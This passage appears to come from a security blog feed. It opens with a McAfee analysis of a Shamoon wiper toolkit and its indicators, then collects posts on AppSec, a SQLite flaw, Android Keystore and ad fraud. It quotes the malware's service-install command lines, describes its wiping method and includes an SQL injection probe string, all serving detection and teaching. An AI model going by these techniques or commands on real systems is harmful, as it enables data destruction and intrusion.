It creates a folder on remote computers: C:\\Windows\System32\Program Files\Internet Explorer\Signing.

The spreader copies the executables into that directory.

It runs the executables on the remote machine by creating a batch file in the administrative share \\RemoteMachine\admin$\\process.bat. This file contains the path of the executables. The spreader then sets up the privileges to run the batch file.

If anything fails, the malware creates the text file NotFound.txt, which contains the name of the machine and the OS version. This can be used by the attackers to track any issues in the spreading process.

The following screenshot shows the “execute” function:

If the executable files are not present in the folder Net2, it checks the folders “all” and Net4.

To spread the wipers, the attackers included an additional spreader using Psexec.exe, an administration tool used to remotely execute commands.

The only difference is that this spreader uses psexec, which is supposed to be stored in Net2 on the spreading machine. It could be used on additional machines to move the malware further.

The wiper contains three options:

  • SilentMode: Runs the wiper without any output.
  • BypassAcl: Escalates privileges. It is always enabled.
  • PrintStackTrace: Tracks the number of folders and files erased.

The BypassAcl option is always “true” even if the option is not specified. It enables the following privileges:

  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeTakeOwnershipPrivilege
  • SeSecurityPrivilege

To find files to erase, the malware uses the function GetFullPath to enumerate all paths, then browses every file in every folder on the system and erases each folder and file. It first removes the “read only” attribute so that the files can be overwritten, then changes the creation, write, and access date and time of each file to 01/01/3000 at 12:01:01. The malware rewrites each file two times with random strings, then starts deleting the files using the API CreateFile with the ACCESS_MASK DELETE flag, followed by FILE_DISPOSITION_INFORMATION to delete them. The function ProcessTracker has been coded to track the destruction.
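The artifacts described above (the 01/01/3000 12:01:01 timestamps, the Signing directory, process.bat in the admin$ share, NotFound.txt, the MaintenaceSrv service commands) can be turned into a triage check. The Python below is an added example and not McAfee's code: it runs over a constructed file-system timeline and constructed process command lines, taking only the indicator values from this post, and it also flags any future-dated timestamp as a broader anti-forensics signal than the single value this campaign used.

```python
import csv
import io
from datetime import datetime
from typing import Dict, List, Optional

# Timestamp the wiper writes to every file before overwriting it, as described
# in the analysis above: 01/01/3000 at 12:01:01.
WIPER_TIMESTAMP = datetime(3000, 1, 1, 12, 1, 1)

# Path, filename and command-line indicators taken from this post's lists,
# lower-cased because NTFS paths are case-insensitive. Both NotFound.txt and
# NothingFound.txt appear in the post, so both are kept.
IOC_PATH_FRAGMENTS = (
    r"\program files\internet explorer\signing",
    r"\admin$\process.bat",
)
IOC_FILENAMES = {
    "oclc.exe", "spreader.exe", "spreaderpsexec.exe", "slhost.exe",
    "maintenacesrv32.exe", "maintenacesrv64.exe", "notfound.txt", "nothingfound.txt",
}
IOC_COMMAND_FRAGMENTS = (
    "sc config maintenacesrv binpath=",
    "sc start maintenacesrv",
    "maintenacesrv32.exe localservice",
    "maintenacesrv32.exe service",
)

# Constructed file-system timeline (not real evidence): path, created,
# modified and accessed timestamps, size. An MFT or Sysmon export would be
# normalised into this shape before triage.
SAMPLE_TIMELINE = r"""path,created,modified,accessed,size
C:\Users\alice\Documents\budget.xlsx,3000-01-01T12:01:01,3000-01-01T12:01:01,3000-01-01T12:01:01,48211
C:\Users\alice\Documents\notes.txt,2018-11-02T09:15:00,2018-12-10T17:44:12,2018-12-11T08:00:03,1203
C:\Windows\System32\Program Files\Internet Explorer\Signing\SlHost.exe,2018-12-10T03:12:55,2018-12-10T03:12:55,2018-12-10T03:13:40,311296
\\HOST-01\admin$\process.bat,2018-12-10T03:13:02,2018-12-10T03:13:02,2018-12-10T03:13:05,188
C:\all\NotFound.txt,2018-12-10T03:14:11,2018-12-10T03:14:11,2018-12-10T03:14:11,64
C:\Users\alice\Pictures\holiday.jpg,2017-07-19T14:02:10,2017-07-19T14:02:10,2018-12-09T21:10:44,2048000
"""

# Constructed process-creation command lines; the first is the service
# installation line quoted in the post's indicator list.
SAMPLE_COMMANDS = [
    r'cmd.exe /c "ping -n 30 127.0.0.1 >nul && sc config MaintenaceSrv binpath= C:\windows\system32\MaintenaceSrv64.exe LocalService" && ping -n 10 127.0.0.1 >nul && sc start MaintenaceSrv',
    r"C:\Windows\System32\svchost.exe -k netsvcs",
    r"MaintenaceSrv32.exe LocalService",
]


def triage_timeline(csv_text: str, now: Optional[str] = None) -> List[Dict[str, object]]:
    """Flag rows carrying the wiper's sentinel timestamp or toolkit indicators.

    `now` is an ISO-8601 string (defaults to the current time); any timestamp
    after it is reported as future-dated.
    """
    now_dt = datetime.fromisoformat(now) if now else datetime.now()
    findings: List[Dict[str, object]] = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        path = row["path"]
        lowered = path.lower()
        stamps = [datetime.fromisoformat(row[k]) for k in ("created", "modified", "accessed")]
        reasons: List[str] = []
        if any(ts == WIPER_TIMESTAMP for ts in stamps):
            reasons.append("wiper sentinel timestamp 3000-01-01 12:01:01")
        elif any(ts > now_dt for ts in stamps):
            reasons.append("future-dated timestamp")
        filename = lowered.rsplit("\\", 1)[-1]
        if filename in IOC_FILENAMES:
            reasons.append("toolkit filename: " + filename)
        reasons.extend("toolkit path: " + frag for frag in IOC_PATH_FRAGMENTS if frag in lowered)
        if reasons:
            findings.append({"path": path, "reasons": reasons})
    return findings


def triage_commands(lines: List[str]) -> List[str]:
    """Return command lines matching the MaintenaceSrv service install/launch patterns."""
    return [line for line in lines if any(frag in line.lower() for frag in IOC_COMMAND_FRAGMENTS)]


if __name__ == "__main__":
    for finding in triage_timeline(SAMPLE_TIMELINE):
        print(finding["path"], "->", "; ".join(finding["reasons"]))
    for line in triage_commands(SAMPLE_COMMANDS):
        print("suspicious command:", line)
```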

Conclusion

In the 2017 wave of Shamoon attacks, we saw two wipers; we see a similar feature in the December 2018 attacks. Using the “tool kit” approach, the attackers can spread the wiper module through the victims’ networks. The wiper is not obfuscated and is written in .Net code, unlike the Shamoon Version 3 code, which is encrypted to mask its hidden features.

Attributing this attack is difficult because we do not have all the pieces of the puzzle. We do see that this attack is in line with the Shamoon Version 2 techniques. Political statements have been a part of every Shamoon attack. In Version 1, the image of a burning American flag was used to overwrite the files. In Version 2, the picture of a drowned Syrian boy was used, with a hint of Yemeni Arabic, referring to the conflicts in Syria and Yemen. Now we see a verse from the Quran, which might indicate that the adversary is related to another Middle Eastern conflict and wants to make a statement.

When we look at the tools, techniques, and procedures used during the multiple waves, and by matching the domains and tools used (as FireEye described in its report), we conclude that APT33 or a group attempting to appear to be APT33 is behind these attacks.

Coverage

The files we detected during this incident are covered by the following signatures:

  • Trojan-Wiper
  • RDN/Generic.dx
  • RDN/Ransom

Indicators of compromise

Hashes

  • OCLC.exe: d9e52663715902e9ec51a7dd2fea5241c9714976e9541c02df66d1a42a3a7d2a
  • Spreader.exe: 35ceb84403efa728950d2cc8acb571c61d3a90decaf8b1f2979eaf13811c146b
  • SpreaderPsexec.exe: 2ABC567B505D0678954603DCB13C438B8F44092CFE3F15713148CA459D41C63F
  • Slhost.exe: 5203628a89e0a7d9f27757b347118250f5aa6d0685d156e375b6945c8c05eb8a

File paths and filenames

  • C:\net2\
  • C:\all\
  • C:\net4\
  • C:\windows\system32\
  • C:\\Windows\System32\Program Files\Internet Explorer\Signing
  • \\admin$\process.bat
  • NothingFound.txt
  • MaintenaceSrv32.exe
  • MaintenaceSrv64.exe
  • SlHost.exe
  • OCLC.exe
  • Spreader.exe
  • SpreaderPsexec.exe

Some command lines

  • cmd.exe /c ""C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat
  • cmd.exe /c "ping -n 30 127.0.0.1 >nul && sc config MaintenaceSrv binpath= C:\windows\system32\MaintenaceSrv64.exe LocalService" && ping -n 10 127.0.0.1 >nul && sc start MaintenaceSrv
  • MaintenaceSrv32.exe LocalService
  • cmd.exe /c ""C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat " "
  • MaintenaceSrv32.exe service

The post Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems appeared first on McAfee Blogs.

Political Campaigns Need Privacy Policies and Training

When I made the transition from working in American Politics to learning about Privacy, the first tidbit of information I was given was that there was a difference in terminology between the American and the European practice. In America, we use the term Privacy but in Europe they use the term Data Protection. As I […]

The post Political Campaigns Need Privacy Policies and Training appeared first on Privacy Ref Blog.

Beyond Scanning: Don’t Let AppSec Ignorance Become Negligence

In recent months, as I’ve worked with more and more prospects and customers, I’ve started to see an interesting trend: As more agile dev teams become responsible for their own security posture, they are relying on the operations team to “plug an AppSec tool” into their CI/CD pipeline to take care of their AppSec. While I agree with the sentiment that security needs to be embedded in the build process, I am always surprised that a “tool integrated into a CI/CD pipeline” is as far as the planning typically goes. That said, I was told by one of my best mentors that consistency should never be a surprise.

When I ask these same teams, “once you plug a tool into your CI/CD and you get results, what are your next steps?” I am mainly met with little to no response. Basically, these teams are going from ignorance of their application security state, to knowledge of security-related defects in their code, to security negligence by not acting to address these risky defects.

I have even seen AppSec programs that check all the boxes – they have solid, prioritized app inventories; executive sponsorship; integrations; remediation and mitigation points; policy management; multiple testing techniques; and centralized reporting – yet some agile teams are stepping in and taking a “tool approach” that only focuses on scanning instead. This is not only short-sighted, but also reveals a knowledge gap surrounding what it takes to make an AppSec program successful as security hands the program to individual agile dev teams. When I check in on these security teams, inevitably all the early momentum they leveraged to overcome cultural hurdles and foster a “security is everyone’s responsibility” mentality has come to a halt. This includes the aspirational goals around passing policy and establishing remediation checkpoints. This is not due to development doing the scanning directly (they should do this), but rather governance of the larger AppSec outcomes fading away. Ops seems more interested in how many scans they can do per day … with no further outcome.

Don’t fall into this trap. You can’t scan your way to secure code. Security teams still need to be a part of the security picture as scanning occurs in the CI/CD pipeline. Here are three key aspects of application security “beyond scanning” that will produce real risk reduction from your efforts:

Secure coding education:

The easiest flaw to fix is the one that is never introduced in the first place. However, most developers don’t have secure coding skills. While it is great to have a scanner built into the CI/CD pipeline, it is just as important now to shift testing “left.” With tools like Veracode’s Greenlight, developers can fix flaws in real time in their IDE while building their applications. In turn, developers learn as they code and reduce the number of flaws introduced over time. In addition, to help drive secure coding education, Veracode provides a number of options for sharing best practices, including instructor-led trainings such as lunch and learns, eLearning on AppSec, and developer workshops on secure coding.

Fixing what you find:

Ultimately, your AppSec program is not effective if you’re not fixing what you find. You can scan every piece of code you write, but without adequate training and guidance, you will not create more secure code. In fact, you will delay developer timelines and still produce vulnerable code. Enabling developers with both a scanning tool and remediation and mitigation guidance is key. At Veracode, we conduct over 5,000 consultation calls a year with development teams, guiding them through fixing flaws they have never had to address before. And we’ve found that after only one to two of these calls, developers’ secure coding know-how improves dramatically.

In addition, your AppSec program also needs to be set up to enable remediation guidance.

For instance, every scan completed should be assessed against a policy — not a policy that changes how you scan or what is discovered, but rather a filter of the results to see if you passed or failed based on the parameters you set for risk tolerance. This policy should also include: how often does a team need to scan, how long do they have to fix certain flaws based on severity/criticality, and what scanning techniques must be used. In addition, you need remediation time built in between scans. Just scanning multiple times a day and pulling results into a tracking system is not useful if no one has the bandwidth to fix anything. You are better off setting a realistic scanning schedule (once a day) so developers have time to fix what they find. You can increase scan frequency as you become more secure and are passing policy on a regular basis.

Scaling:

Can your security team help your development teams fix all the flaws their scans are finding? If you have multiple development teams working in different environments, this can be a nearly impossible task for one central security team. In addition, developers are naturally curious, so just giving them scan results without explaining the underlying technology finding the flaws will lead to push back.

Considering the skills shortage, engaging outside AppSec expertise goes a long way, both to establish your program’s goals and roadmap and keep it on track, and to guide you through fixing the flaws you find. We aren’t suggesting you replace your security team with consultants, but rather that you complement it with specialized AppSec expertise.

We’ve seen the difference this support makes: Veracode customers who work with our Security Program Managers grow their application coverage by 25 percent each year, decrease their time to deployment, and demonstrate better vulnerability detection and remediation metrics. In addition, Veracode has a fully staffed Advanced Integration Team. They work with global companies to help build out scanning in complex CI/CD environments that can vary by teams and regions. It is rare we see a one-and-done simple set-up that enables a full organization. Ultimately, our experienced Security Program Managers help you define the goals of your program, onboard and answer questions about Veracode products, and work with your teams to ensure that your program stays on track and continues to mature.

Learn more

Don’t let ignorance become negligence. Get details on what a mature, effective AppSec program looks like in our Everything You Need to Know About Maturing Your AppSec Program guide.

SQLite Vulnerability May Be Putting Your Applications at Risk

Late last week, Tencent announced that researchers from its Blade Team had discovered a remote code execution (RCE) vulnerability in SQLite, dubbed Magellan. SQLite is a very popular embedded SQL server. It is one of the components inside many thousands of applications, including the Google Chromium browser. Google has since updated Chromium to contain the fixed version of SQLite, version 3.26.0, released on December 1. Although there are no reports of the vulnerability being executed in the wild, a situation where a high-impact vulnerability is found in a component that is in widespread use is usually a cause for alarm. This case, however, has some mitigating circumstances that will keep this from being another Heartbleed-size problem.

As discussed in previous posts, when we look at vulnerabilities in open source components, we need to distinguish between a component that contains a vulnerability and how that component is used by an application. Every development team that embedded SQLite needs to be doing this right now. It turns out that for an attacker to exploit this particular vulnerability in an application, they need to be able to manipulate queries that the application makes to SQLite. Chromium implements Web SQL, which allows an attacker to create a web page that will send SQL commands to the embedded SQLite code – thus making it vulnerable. If your application allows user input to construct SQL queries, then your application is likely vulnerable, too.

There are other situations where your application may be vulnerable. Allowing attackers to construct SQL queries sounds a lot like a SQL injection vulnerability. If your app does have a SQLi vulnerability, you may now have a bigger problem with a far more serious RCE vulnerability if you’re using an outdated version of SQLite. If you’re using application security testing techniques, including SAST, DAST, and manual penetration testing and fixing issues found as a part of your development process, you may feel confident that your apps don’t have any SQLi vulnerabilities. Whether or not you have an AppSec program in place, the best thing that development teams can do is update to the latest version of SQLite.

This is true any time you determine that your application uses a component with a known vulnerability, and updating does not need to be a fire drill. Software composition analysis (SCA) can look at the open source code in your app and tell you if there are known vulnerabilities and if a vulnerable method is being called. Veracode’s SCA product uses control flow analysis to do this quickly, without a manual inspection of the components in use. If you find that your application or applications are not vulnerable, you can wait until there is a convenient time to update the component so that keeping current isn’t disruptive to your development schedule.
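As an added illustration of the two controls this post recommends (it is not Veracode's code), the Python below checks whether the SQLite library linked into the process is at least 3.26.0 and contrasts a query that splices caller input into SQL with one that binds it as a parameter, using a constructed in-memory table.

```python
import sqlite3
from typing import List, Tuple

# SQLite release carrying the Magellan fix, as stated in the post above.
FIXED_VERSION = (3, 26, 0)


def parse_version(text: str) -> Tuple[int, ...]:
    """'3.25.3' -> (3, 25, 3) so releases compare numerically, not lexically."""
    return tuple(int(part) for part in text.split("."))


def sqlite_is_patched(version: str = sqlite3.sqlite_version) -> bool:
    """True when the SQLite library in use is 3.26.0 or later."""
    return parse_version(version) >= FIXED_VERSION


def demo_db() -> sqlite3.Connection:
    # Constructed sample data (not from the post).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, email TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "alice@example.invalid"), ("bob", "bob@example.invalid")])
    return con


def find_user_unsafe(con: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    # Caller-supplied text is spliced into the statement, so whoever controls
    # `name` controls what SQLite parses: the exposure the post describes.
    statement = "SELECT name, email FROM users WHERE name = '%s'" % name
    return con.execute(statement).fetchall()


def find_user_safe(con: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    # The value travels as a bound parameter; the statement text is fixed, so
    # user input is only ever compared as data and never parsed as SQL.
    return con.execute("SELECT name, email FROM users WHERE name = ?", (name,)).fetchall()


if __name__ == "__main__":
    print("SQLite", sqlite3.sqlite_version, "patched:", sqlite_is_patched())
    con = demo_db()
    probe = "' OR '1'='1"  # data to the safe query, SQL to the unsafe one
    print("unsafe:", find_user_unsafe(con, probe))
    print("safe:  ", find_user_safe(con, probe))
```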

To learn more about how Veracode can help mitigate your organization’s open source risk, download our whitepaper: https://info.veracode.com/whitepaper-solving-your-open-source-risk-with-sourceclear.html

The Origin of the Quote “There Are Two Types of Companies”

While listening to a webcast this morning, I heard the speaker mention

There are two types of companies: those who have been hacked, and those who don’t yet know they have been hacked.

He credited Cisco CEO John Chambers but didn't provide any source.

That didn't sound right to me. I could think of two possible antecedents, so I did some research. I confirmed my memory and would like to present what I found here.

John Chambers did indeed offer the previous quote, in a January 2015 post for the World Economic Forum titled What does the Internet of Everything mean for security? Unfortunately, neither Mr Chambers nor the person who likely wrote the article for him decided to credit the author of this quote.

Before providing proper credit for this quote, we need to decide what the quote actually says. As noted in this October 2015 article by Frank Johnson titled Are there really only “two kinds of enterprises”?, there are really (at least) two versions of this quote:

A popular meme in the information security industry is, “There are only two types of companies: those that know they’ve been compromised, and those that don’t know.”

And the second is like unto it: “There are only two kinds of companies: those that have been hacked, and those that will be.”

We see that the first is a version of what Mr Chambers said. Let's call that 2-KNOW. The second is different. Let's call that 2-BE.

The first version, 2-KNOW, can be easily traced and credited to Dmitri Alperovitch. He stated this proposition as part of the publicity around his Shady RAT report, written while he worked at McAfee. For example, this 3 August 2011 story by Ars Technica, Operation Shady RAT: five-year hack attack hit 14 countries, quotes Dmitri in the following:

So widespread are the attacks that Dmitri Alperovitch, McAfee Vice President of Threat Research, said that the only companies not at risk are those who have nothing worth taking, and that of the world's biggest firms, there are just two kinds: those that know they've been compromised, and those that still haven't realized they've been compromised.

Dmitri used slightly different language in this popular Vanity Fair article from September 2011, titled Enter the Cyber-Dragon:

Dmitri Alperovitch, who discovered Operation Shady rat, draws a stark lesson: “There are only two types of companies—those that know they’ve been compromised, and those that don’t know. If you have anything that may be valuable to a competitor, you will be targeted, and almost certainly compromised.”

No doubt former FBI Director Mueller read this report (and probably spoke with Dmitri). He delivered a speech at RSA on 1 March 2012 that introduced question 2-BE into the lexicon, plus a little more:

For it is no longer a question of “if,” but “when” and “how often.”

I am convinced that there are only two types of companies: those that have been hacked and those that will be. 

And even they are converging into one category: companies that have been hacked and will be hacked again.  

Here we see Mr Mueller morphing Dmitri's quote, 2-KNOW, into the second, 2-BE. He also introduced a third variant -- "companies that have been hacked and will be hacked again." Let's call this version 2-AGAIN.

The very beginning of Mr Mueller's quote is surely a play on Kevin Mandia's long-term commitment to the inevitability of compromise. However, as far as I could find, Kevin did not use the "two companies" language.

One article that mentions version 2-KNOW and Kevin is this December 2014 Ars Technica article titled “Unprecedented” cyberattack no excuse for Sony breach, pros say. However, the article is merely citing other statements by Kevin along with the aphorism of version 2-KNOW.

Finally, there's a fourth version introduced by Mr Mueller's successor, James Comey, as well! In a 6 October 2014 story, FBI Director: China Has Hacked Every Big US Company, Mr Comey said:

Speaking to CBS' 60 Minutes, James Comey had the following to say on Chinese hackers: 

There are two kinds of big companies in the United States. There are those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese.

Let's call this last variant 2-CHINA.

To summarize, there are four versions of the "two companies" quote:

  • 2-KNOW, credited to Dmitri Alperovitch in 2011, says "There are only two types of companies—those that know they’ve been compromised, and those that don’t know."
  • 2-BE, credited to Robert Mueller in 2012, says "[T]here are only two types of companies: those that have been hacked and those that will be."
  • 2-AGAIN, credited to Robert Mueller in 2012, says "[There are only two types of companies:] companies that have been hacked and will be hacked again."
  • 2-CHINA, credited to James Comey in 2014, says "There are two kinds of big companies in the United States. There are those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese."

Now you know!


New Keystore features keep your slice of Android Pie a little safer


Posted by Lilian Young and Shawn Willden, Android Security; and Frank Salim, Google Pay

[Cross-posted from the Android Developers Blog]

New Android Pie Keystore Features

The Android Keystore provides application developers with a set of cryptographic tools that are designed to secure their users' data. Keystore moves the cryptographic primitives available in software libraries out of the Android OS and into secure hardware. Keys are protected and used only within the secure hardware to protect application secrets from various forms of attacks. Keystore gives applications the ability to specify restrictions on how and when the keys can be used.
Android Pie introduces new capabilities to Keystore. We will be discussing two of these new capabilities in this post. The first enables restrictions on key use so as to protect sensitive information. The second facilitates secure key use while protecting key material from the application or operating system.

Keyguard-bound keys

There are times when a mobile application receives data but doesn't need to immediately access it if the user is not currently using the device. Sensitive information sent to an application while the device screen is locked must remain secure until the user wants access to it. Android Pie addresses this by introducing keyguard-bound cryptographic keys. When the screen is locked, these keys can be used in encryption or verification operations, but are unavailable for decryption or signing. If the device is currently locked with a PIN, pattern, or password, any attempt to use these keys will result in an invalid operation. Keyguard-bound keys protect the user's data while the device is locked and make it available only when the user needs it.
Keyguard binding and authentication binding both function in similar ways, except with one important difference. Keyguard binding ties the availability of keys directly to the screen lock state while authentication binding uses a constant timeout. With keyguard binding, the keys become unavailable as soon as the device is locked and are only made available again when the user unlocks the device.
It is worth noting that keyguard binding is enforced by the operating system, not the secure hardware. This is because the secure hardware has no way to know when the screen is locked. Hardware-enforced Android Keystore protection features, like authentication binding, can be combined with keyguard binding for a higher level of security. Furthermore, since keyguard binding is an operating system feature, it's available to any device running Android Pie.
Keys for any algorithm supported by the device can be keyguard-bound. To generate or import a key as keyguard-bound, call setUnlockedDeviceRequired(true) on the KeyGenParameterSpec or KeyProtection builder object at key generation or import.

Secure Key Import

Secure Key Import is a new feature in Android Pie that allows applications to provision existing keys into Keystore in a more secure manner. The origin of the key, a remote server that could be sitting in an on-premise data center or in the cloud, encrypts the secure key using a public wrapping key from the user's device. The encrypted key in the SecureKeyWrapper format, which also contains a description of the ways the imported key is allowed to be used, can only be decrypted in the Keystore hardware belonging to the specific device that generated the wrapping key. Keys are encrypted in transit and remain opaque to the application and operating system, meaning they're only available inside the secure hardware into which they are imported.

Secure Key Import is useful in scenarios where an application intends to share a secret key with an Android device, but wants to prevent the key from being intercepted or from leaving the device. Google Pay uses Secure Key Import to provision some keys on Pixel 3 phones, to prevent the keys from being intercepted or extracted from memory. There are also a variety of enterprise use cases such as S/MIME encryption keys being recovered from a Certificate Authority's escrow so that the same key can be used to decrypt emails on multiple devices.
To take advantage of this feature, please review this training article. Please note that Secure Key Import is a secure hardware feature, and is therefore only available on select Android Pie devices. To find out if the device supports it, applications can generate a KeyPair with PURPOSE_WRAP_KEY.
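The device side of the flow described above, as an added example that is not part of the original post: generating the wrapping key pair with PURPOSE_WRAP_KEY (which doubles as the support check the post mentions) and importing the SecureKeyWrapper blob the server returns. The aliases are hypothetical; the attestation challenge and the server's verification of the returned certificate chain are assumed, following the platform's documented flow rather than anything stated in the post.

```java
import android.security.keystore.KeyGenParameterSpec;
import android.security.keystore.KeyProperties;
import android.security.keystore.WrappedKeyEntry;
import java.security.KeyPairGenerator;
import java.security.KeyStore;
import java.security.ProviderException;
import java.security.cert.Certificate;
import java.security.spec.MGF1ParameterSpec;
import javax.crypto.spec.OAEPParameterSpec;
import javax.crypto.spec.PSource;

public final class SecureKeyImportClient {
    private static final String WRAPPING_ALIAS = "server-wrapping-key";  // hypothetical alias
    private static final String IMPORTED_ALIAS = "imported-secret";      // hypothetical alias

    // Step 1: create the RSA wrapping key pair. PURPOSE_WRAP_KEY is only accepted by secure
    // hardware that supports Secure Key Import, so a failure here means "not supported".
    static Certificate[] createWrappingKey(byte[] attestationChallenge) throws Exception {
        KeyPairGenerator kpg = KeyPairGenerator.getInstance(
                KeyProperties.KEY_ALGORITHM_RSA, "AndroidKeyStore");
        kpg.initialize(new KeyGenParameterSpec.Builder(WRAPPING_ALIAS, KeyProperties.PURPOSE_WRAP_KEY)
                .setKeySize(2048)
                .setDigests(KeyProperties.DIGEST_SHA256)
                .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_RSA_OAEP)
                // Attestation lets the server confirm the public key it wraps to is hardware-backed.
                .setAttestationChallenge(attestationChallenge)
                .build());
        try {
            kpg.generateKeyPair();
        } catch (ProviderException unsupported) {
            return null;  // this device's secure hardware does not support Secure Key Import
        }
        KeyStore ks = KeyStore.getInstance("AndroidKeyStore");
        ks.load(null);
        return ks.getCertificateChain(WRAPPING_ALIAS);  // sent to the server, which verifies it
    }

    // Step 2: import the SecureKeyWrapper blob returned by the server. The blob carries the
    // key description (allowed algorithm and purposes); the key material is decrypted only
    // inside the secure hardware holding the wrapping private key, never in the app or OS.
    static void importWrappedKey(byte[] secureKeyWrapper) throws Exception {
        OAEPParameterSpec oaep = new OAEPParameterSpec("SHA-256", "MGF1",
                MGF1ParameterSpec.SHA1, PSource.PSpecified.DEFAULT);
        WrappedKeyEntry entry = new WrappedKeyEntry(secureKeyWrapper, WRAPPING_ALIAS,
                "RSA/ECB/OAEPPadding", oaep);
        KeyStore ks = KeyStore.getInstance("AndroidKeyStore");
        ks.load(null);
        ks.setEntry(IMPORTED_ALIAS, entry, null);  // the entry carries its own protection
    }
}
```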

Tackling ads abuse in apps and SDKs



Providing users with safe and secure experiences, while helping developers build and grow quality app businesses, is our top priority at Google Play. And we’re constantly working to improve our protections.

Google Play has been working to minimize app install attribution fraud for several years. In 2017 Google Play made available the Google Play Install Referrer API, which allows ad attribution providers, publishers and advertisers to determine which referrer was responsible for sending the user to Google Play for a given app install. This API was specifically designed to be resistant to install attribution fraud and we strongly encourage attribution providers, advertisers and publishers to insist on this standard of proof when measuring app install ads. Users, developers, advertisers and ad networks all benefit from a transparent, fair system.

We also take reports of questionable activity very seriously. If an app violates our Google Play Developer policies, we take action. That’s why we began our own independent investigation after we received reports of apps on Google Play accused of conducting app install attribution abuse by falsely claiming credit for newly installed apps to collect the download bounty from that app’s developer.

We now have an update regarding our ongoing investigation:

  • On Monday, we removed two apps from the Play Store because our investigation discovered evidence of app install attribution abuse.
  • We also discovered evidence of app install attribution abuse in 3 ad network SDKs. We have asked the impacted developers to remove those SDKs from their apps. Because we believe most of these developers were not aware of the behavior from these third-party SDKs, we have given them a short grace period to take action.
  • Google Ads SDKs were not utilized for any of the abusive behaviors mentioned above.
  • Our investigation is ongoing and additional reviews of other apps and third party SDKs are still underway. If we find evidence of additional policy violations, we will take action.
We will continue to investigate and improve our capabilities to better detect and protect against abusive behavior and the malicious actors behind it.

ASPIRE to keep protecting billions of Android users



Customization is one of Android's greatest strengths. Android's open source nature has enabled thousands of device types that cover a variety of use cases. In addition to adding features to the Android Open Source Project, researchers, developers, service providers, and device and chipset manufacturers can make updates to improve Android security. Investing and engaging in academic research advances the state-of-the-art security techniques, contributes to science, and delivers cutting edge security and privacy features into the hands of end users. To foster more cooperative applied research between the Android Security and Privacy team and the wider academic and industrial community, we're launching ASPIRE (Android Security and PrIvacy REsearch).

ASPIRE's goal is encouraging the development of new security and privacy technology that impacts the Android ecosystem in the next 2 to 5 years, but isn't planned for mainline Android development. This timeframe extends beyond the next annual Android release to allow adequate time to analyze, develop, and stabilize research into features before including them in the platform. To collaborate with security researchers, we're hosting events and creating more channels to contribute research.

On October 25th 2018, we invited top security and privacy researchers from around the world to present at Android Security Local Research Day (ASLR-D). At this event, external researchers and Android Security and Privacy team members discussed current issues and strategies that impact the future direction of security research—for Android and the entire industry.

We can't always get everyone in the same room and good ideas come from everywhere. So we're inviting all academic researchers to help us protect billions of users. Research collaborations with Android should be as straightforward as collaborating with the research lab next door. To get involved you can:

  1. Submit an Android security / privacy research idea or proposal to the Google Faculty Research Awards (FRA) program.
  2. Apply for a research internship as a student pursuing an advanced degree.
  3. Apply to become a Visiting Researcher at Google.
  4. If you have any security or privacy questions that may help with your research, reach out to us.
  5. Co-author publications with Android team members, outside the terms of FRA.
  6. Collaborate with Android team members to make changes to the Android Open Source Project.

Let’s work together to make Android the most secure platform—now and in the future.

3 ways Mastercard uses AI to fight fraud

Credit card giant Mastercard envisions a future where consumers make purchases not only from smartphones, but via virtual assistants, cars and other connected machines. But with hackers trolling the dark corners of the web to grab financial gain with minimal effort, Mastercard must also be able to vet and secure purchases in mere milliseconds.

To facilitate its vision for a veritable Cambrian explosion in digital payments, Mastercard is using sophisticated fraud analytics systems and software, which are being increasingly augmented with artificial intelligence (AI) technologies, Ed McLaughlin, president of operations and technology at Mastercard, tells CIO.com. AI can help software and connected systems facilitate more secure payments than a human checking out at a kiosk using the traditional plastic card — even one with a chip embedded in it.
